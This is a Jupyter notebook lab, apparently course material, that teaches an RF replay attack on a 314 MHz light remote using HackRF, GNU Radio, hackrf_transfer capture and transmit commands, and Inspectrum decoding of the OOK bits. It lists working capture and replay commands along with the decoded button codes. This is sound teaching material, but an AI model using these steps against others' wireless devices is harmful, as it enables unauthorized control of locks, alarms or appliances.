# Simple Replay Attack Demo with GNU Radio

Learn how to replay RF signals using SDR!

## Learning Objectives
In this module, you will learn about the following:
- understanding how replay attacks work
- saving a waveform to file
- using the Inspectrum software for signal anlysis
- understanding On-Off-Keying (OOK)
- transmitting using a transmit-capable SDR
- replaying a captured radio signal

## Prerequisites
- Python knowledge
- General purpose SDR tools or GNU Radio, installed locally.
- RTL-SDR to receive and transmit-capable SDR to transmit RF signals  

# Replay Attacks
There are many ways for replay attacks, and the methods can be chosen based upon your needs and the cost, complexity, and versatility of the devices and tools available.

In this module we will be using a simple RF radio device, a **remote control** and **HackRF** in order to receive and transmit signals. This remote is used to turn on and off the lights. Remote has A, B, and OnOff keys on it. We will first give signal from original transmitter, capture it, and see if we can replay it later. Also, you can find already recorded IQ files in the folder. These exist `HighTek_A.dat`, `HighTek_B.dat`, and `HighTek_OnOff.dat` files. In the first part we will use HackRF along with **GNU Radio**, in the second part **HackRF tool `hackrf_transfer`** will be used. In the third part, RF data from the remote control will be analyzed and decoded. 

<img src="nbimages/hightek.png" />

# Simple Replay Attack with GNU Radio
HackRF can be used in conjunction with GNU Radio flow-graphs to capture, save, and replay RF signals. This method requires some prior knowledge on GNU Radio. But the steps we will follow are: 
* Search the signal of interest  
* Save the waveform ie, capture
* Make sure it has been captured correctly
* Replay the captured signal

## 1. Searching the Signal

The first thing to do is to try to find the exact **operating frequency** of the device. It is good idea to look at **ISM bands** for this task first. ISM bands or **Industrial Scientific and Medical** bands. You would use such a band is because it's unlicensed in that you are allowed to use equipment that operates in that band without you having a license yourself. There may be rules however about the authorization of the equipment even though there aren't rules about the authorization of the user of the equipment so we call those unlicensed bands. 

<img src="nbimages/ISM_bands.png" alt="Drawing" />

So, we will start by making a flow graph to receive a signal from the remote control and will start with just visualize the signal we have recived. GNU Radio flowgraph sketched below helps you to monitor spectrum for signal of interest. The flowgraph is contained in `Monitor.grc`. 

<img src="nbimages/grc_1_monitor.png" alt="Drawing" />

In [ ]:
!grcc Monitor.grc 
!python3 Monitor.py --filename='HighTek_A.dat'

## 2. Saving a Waveform to File

After adjusting the center frequency for optimum gain and clarity, we can use the following flowgraph `CaptureAndRecord.grc` and then press the peripheral remote button and ultimately capture the RF signal burst to a file. This is just a raw digital waveform. It's the information coming from the Hack RF being saved directly to a file. We are not demodulating, filtering, or doing any kind of processing whatsoever. We are just taking the data from our SDR, Hack RF, and sending it to a file. 

<img src="nbimages/grc_2_capture.png" alt="Drawing" />

In [ ]:
!grcc CaptureAndRecord.grc 
!python3 CaptureAndRecord.py --filename='HighTek_A.dat'

## 3. Checking the File
Make sure your record actually contains something meaningful! In order to verify that we have captured our signal of interest we will visualize things. We will again use a QT GUI Frequency Sink however we probably want to slow it down with a throttle block in order to perform in the same speed as real time. We should set the sample rate to be the same sample rate that we have used for the capture which was 2 million samples per second, 2 MSPS. We will give this flow graph a name `CheckRecord.grc`. Run the GR flowgraph below to see what the capture contains. 

<img src="nbimages/grc_3_check.png" alt="Drawing" />

In [8]:
!grcc CheckRecord.grc 
!python3 CheckRecord.py --filename='HighTek_A.dat'

>>> Warning: vocoder_codec2_decode_ps - option_attributes are for enums only, ignoring
>>> Warning: vocoder_codec2_encode_sp - option_attributes are for enums only, ignoring
<<< Welcome to GNU Radio Companion Compiler 3.10.1.1 >>>

Block paths:
	/home/murat/.grc_gnuradio
	/usr/share/gnuradio/grc/blocks
	/usr/local/share/gnuradio/grc/blocks

>>> Loading: /home/murat/gitdir/UHTE-2/ReplayAttack/CheckRecord.grc
>>> Generating: /home/murat/gitdir/UHTE-2/ReplayAttack/CheckRecord.py
Traceback (most recent call last):
  File "/home/murat/gitdir/UHTE-2/ReplayAttack/CheckRecord.py", line 24, in <module>
    from gnuradio import qtgui
ModuleNotFoundError: No module named 'gnuradio'


## 4. Replaying a Captured Radio Signal
HackRF can replay (transmit) the raw RF signal in the saved file and thereby invoke the desired peripheral activity without the use of the physical remote. `ReplayOnly.grc` simply transmits the recorded signal. 

<img src="nbimages/grc_4_replay_simple.png" alt="Drawing" />

In [ ]:
!grcc ReplayOnly.grc 
!python3 ReplayOnly.py --filename='HighTek_A.dat'

We can do much better if we apply some **gain** and **filtering** before transmission. `ReplayBetter.grc` does these before sending. 

Amplifying our signal digitally allows us to use larger portion of the dynamic range. This is done with the multiplication block. 

After amplification, we apply bandpass filter, being a much better neighbor on the spectrum. 

<img src="nbimages/grc_5_replay_better.png" alt="Drawing" />

In [ ]:
!grcc ReplayBetter.grc 
!python3 ReplayBetter.py --filename='HighTek_A.dat'

## Hint: Running GNU Radio from Terminal
You can run the GNU Radio flow graph right from terminal. Do not forget to specify the filename as parameter. 

In [ ]:
!python3 ReplayBetter.py --filename='HighTek_A.dat'

# Simple Replay Attack with HackRF Tools
One of the quickest ways to replay an RF signal when the signal center frequency is known is using the HackRF “hackrf_transfer“ utility. You can use the following command to capture a radio signal and save it to a file with hackrf_transfer. 

In [41]:
!hackrf_transfer -s 2000000 -f 314000000 -n 20000000 -r hackrf.dat -a 1 -g 32

call hackrf_set_sample_rate(2000000 Hz/2.000 MHz)
call hackrf_set_hw_sync_mode(0)
call hackrf_set_freq(314000000 Hz/314.000 MHz)
call hackrf_set_amp_enable(1)
samples_to_xfer 20000000/20Mio
Stop with Ctrl-C
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -19.1 dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -19.2 dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -11.0 dBfs
 4.2 MiB / 1.000 sec =  4.2 MiB/second, amplitude -19.2 dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -19.2 dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -19.2 dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -19.2 dBfs
 4.2 MiB / 1.000 sec =  4.2 MiB/second, amplitude -19.2 dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -19.2 dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -19.2 dBfs
 0.3 MiB / 1.000 sec =  0.3 MiB/second, amplitude -21.5 dBfs

Exiting... hackrf_is_streaming() result: streaming terminated (-1004)
Total time: 11.00253 s
hackrf_stop_rx() done
hackrf

Having saved the signal, you can transmit it with the following command. 

<mark>Keep in mind that hackrf_transfer utility uses signed 8 bit format by default. So if you just play the GNU Radio record files, it will not work! That's because GNU Radio uses floating point format. </mark>


In [51]:
!hackrf_transfer -s 2000000 -f 314000000 -R -t hackrf.dat -a 1 -x 32

call hackrf_set_sample_rate(2000000 Hz/2.000 MHz)
call hackrf_set_hw_sync_mode(0)
call hackrf_set_freq(314000000 Hz/314.000 MHz)
call hackrf_set_amp_enable(1)
Stop with Ctrl-C
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
 4.2 MiB / 1.000 sec =  4.2 MiB/second, amplitude -inf dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
 4.2 MiB / 1.000 sec =  4.2 MiB/second, amplitude -inf dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
Input file end reached. Rewind to beginning.
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs
 4.2 MiB / 1.000 sec =  4.2 MiB/second, amplitude -inf dBfs
 3.9 MiB / 1.000 sec =  3.9 MiB/second, amplitude -inf dBfs

# Replay Attack by Decoding with Inspectrum

What we have seen so far is **simple** capture and replay attack. It's pretty good considering how easy it is to accomplish. But keep in mind that we didn't have to decode this signal, we didn't have to even understand what the modulation was. Even if we don't know what the modulation is, we could still capture a signal once we've identified it and then replay it and find out if that replay actually does anything. It's a pretty powerful tool to have in our toolbox being able to replay a signal. It's useful for testing systems to see if they respond to a replay packet and it's also extremely useful to create a as a means of creating a repeatable test vector that we can use. 

The cleanest way we could possibly transmit the signal would be actually decoding the information that was transmitted and synthesizing our new waveform that is generated on the CPU without actually capturing any noise at all.  


## A. Decoding with Inspectrum
In order to take a look at what is in this waveform a little bit more in more detail we will use a piece of software called **Inspectrum**.

### 1. Spectrogram View
Inspectrum provides us with spectrogram which is a two-dimensional picture of the information that is saved in the capture
file. What we have is **frequency** on the vertical axis and **time** on the horizontal axis. 

We can open Inspectrum from terminal by specifying sampling rate and file name like below. 

In [ ]:
!inspectrum -r 2e6 HighTek_A.dat

I you scroll right a little bit until, we see things happening a little bit above our center frequency. We can change things like the FFT size which which affects the height of the analysis and we can change the zoom which affects the width. We can also change the color scheme depending on basically setting thresholds of which color are applied to which colors are applied to which power levels. After adjusting things like, you can see that the capture contains 6 bursts of data. The frequency is nearly consistent because everything falls in a horizontal line but the power level goes on and off very dramatically. You can see this is the
beginning of **On-Off-Keying (OOK)** that's pretty cool that we can see that just by looking at the waveform with this tool. 

<img src="nbimages/Inspectrum_1_bursts.png" alt="Drawing" />

### 2. Amplitude Plot
Let's take a closer look at one of the bursts. Zooming in on time axis, we can see clearly that  it transmits for a while and then it's just back to noise and then it transmits for a while and then we're back to noise again. Let's take a look at how we can demodulate this and the nice thing is that Inspectrum actually has some built-in demodulation capability. You have to kind of do a lot of things by hand but you can demodulate a signal like this using nothing but in Inspectrum. So, we know that the amplitude is being modulated here the transmitter is basically being switched from full amplitude to zero amplitude that is completely off so what we need to do is add an **amplitude plot**. The the red line in the center is the center frequency of my tuning and the white lines at the top and bottom are showing the edges of the filter that I'm using to filter this channel and so you can kind of adjust if you want a wider filter you can drag them out and if you want a narrower filter. 

<img src="nbimages/inspectrum_2_amplitude_plot.png" alt="Drawing" />

### 3. Thresholding
The next thing that we can do is you can take this amplitude demodulated signal and add another derived plot, **threshold** plot, and now anything below this dotted line will be counted as a zero and anything above the dotted line will be counted as a one. So, now we have a nice clean representation of kind of all the ons and offs in this signal. 

<img src="nbimages/inspectrum_3_thresholding.png" alt="Drawing" /> 

### 4. Measuring the baudrate
The next thing we need to do is figure out when we're going to measure this signal to see you know where are the ones and zeros and to do that in Spectrum you need to turn on the **cursors**. Cursors have a bunch of uses you can also use them just to measure the baud rates of signals. 

<img src="nbimages/inspectrum_4_measuring_baud.png" alt="Drawing" /> 

### 5. Obtaining Bits
We can start by using cursor for one bit period but eventually once you have the cursor set up properly you can also use them to demodulate and extract data from things. Just looking at kind of one bit period where the transmitter is on you can get a rough idea how long burst will be. Then gradually increase symbol count to 10, 50, and finally to 100. Make sure that we're staying lined up with the bit periods there like my dotted lines are lining up exactly with the bit transitions. So, once you have everything lined up and we're lined up on the threshold plot you can right click there and say **extract symbols**. You can either go to standard output or to the  clipboard. If you choose clipboard, clipboard should have a set of bits okay one zero one zero one zero that sounds about right for the start of the signal and then eventually we get into where the actual bits of the message are. 

<img src="nbimages/inspectrum_5_bits.png" alt="Drawing" /> 

In [52]:
import bitarray
# read data from file
openFile = open("solutions/bits_A.txt", "r")
str = openFile.read().rstrip()
openFile.close()
data= [int(e) if e.strip().isdigit() else e for e in str.split(',')]
data = data[:-1]
print(bitarray.bitarray(data).tobytes())
print (''.join('{:02x}'.format(x) for x in bitarray.bitarray(data).tobytes()))

b'\x8e\x88\xe8\xee\xe8\x8e\x8e\x88\x8e\x8e\x88\xe8\x80'
8e88e8eee88e8e888e8e88e880


In [53]:
import bitarray
# read data from file
openFile = open("solutions/bits_B.txt", "r")
str = openFile.read().rstrip()
openFile.close()
data= [int(e) if e.strip().isdigit() else e for e in str.split(',')]
data = data[:-1]
print(bitarray.bitarray(data).tobytes())
print (''.join('{:02x}'.format(x) for x in bitarray.bitarray(data).tobytes()))

b'\x8e\x88\xe8\xee\xe8\x8e\x8e\x88\x8e\x8e\xe8\x88\x80'
8e88e8eee88e8e888e8ee88880


In [54]:
import bitarray
# read data from file
openFile = open("solutions/bits_OnOff.txt", "r")
str = openFile.read().rstrip()
openFile.close()
data= [int(e) if e.strip().isdigit() else e for e in str.split(',')]
data = data[:-1]
print(bitarray.bitarray(data).tobytes())
print (''.join('{:02x}'.format(x) for x in bitarray.bitarray(data).tobytes()))

b'\x8e\x88\xe8\xee\xe8\x8e\x8e\x88\x8e\x8e\x8e\x88\x80'
8e88e8eee88e8e888e8e8e8880


## B. Synthesizing the Signal with GNU Radio
The next step is to create the desired signal on the fly, directly from GNURadio. Below is the flowgraph that can be used to tranmit the bits we have obtained preivously over the air.  

<img src="nbimages/grc_6_synthesize.png" alt="Drawing" /> 